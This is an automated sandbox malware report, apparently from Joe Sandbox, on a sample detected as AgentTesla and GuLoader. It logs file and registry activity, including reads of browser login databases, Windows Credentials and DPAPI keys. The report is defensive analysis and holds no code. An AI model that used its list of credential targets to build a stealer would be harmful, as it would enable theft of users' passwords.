Yara matches: Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security


General


General


General



File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user read data or list directory | synchronize

device directory file | synchronous io non alert | open for backup ident | open reparse point

object name collision 1 6E313263 unknown

C:\Users\user\AppData\Roaming read data or list directory | synchronize



C:\Users\user read data or list directory | synchronize



C:\Users\user\AppData\Roaming read data or list directory | synchronize



File Path Offset Length Value Ascii Completion Count Source Address Symbol

\Device\ConDrv 0 0 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile

\Device\ConDrv 30 30 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile

File Path Offset Length Completion Count Source Address Symbol

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31099B unknown


C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll.aux

unknown 176 success or wait 1 6E2662DE ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31D97A ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31D97A ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31D97A ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\96b2b7229c43d2712ff1bf4906a723f6\System.Configuration.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\5a5dc2f9e9c66b74d361d490c1f4357b\System.Xml.ni.dll.aux



C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 8171 end of file 1 6E31099B unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile



C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\ccd32e22ed1b362ccbd4b6fe2cda6d0b\System.Management.ni.dll.aux


C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile

File Activities

File Created

File Written

File Read


C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile



C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data unknown 49152 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 3 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 624 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

unknown 45056 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile

C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612


C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3425316567-2969588382-3778222414-1001\4280e3d2-e3f0-4650-bde8-f55a3425c6eb


C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612


C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D


C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D



Key Path Completion Count Source Address Symbol

HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS success or wait 1 6C45FDB8 unknown

Key Path Name Type Data Completion Count Source Address Symbol

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS

EnableFileTracing

dword 0 success or wait 1 6C45FDB8 unknown


EnableAutoFileTracing



EnableConsoleTracing



FileTracingMask dword -65536 success or wait 1 6C45FDB8 unknown


ConsoleTracingMask

dword -65536 success or wait 1 6C45FDB8 unknown


MaxFileSize dword 1048576 success or wait 1 6C45FDB8 unknown


FileDirectory expand unicode %windir%\tracing success or wait 1 6C45FDB8 unknown

Registry Activities

Key Created

Key Value Created


Target ID: 8



Path: C:\Windows\System32\conhost.exe


Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Imagebase: 0x7ff72efe0000


MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68



true





Target ID: 36



Path: C:\Windows\System32\svchost.exe


Commandline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

Imagebase: 0x7ff73d000000


MD5 hash: F586835082F632DC8D9404D83BC16316



true




Key Path Name Type Old Data New Data Completion CountSourceAddress

Symbol

⊘ No disassembly

Analysis Process: conhost.exe PID: 1840, Parent PID: 1836

General

File Activities

Analysis Process: svchost.exe PID: 1900, Parent PID: 888

General

Registry Activities

Disassembly


Date post:	30-Mar-2023
Category:	Documents
Upload:	khangminh22
View:	0 times
Download:	0 times

Generated by Joe Sandbox

Documents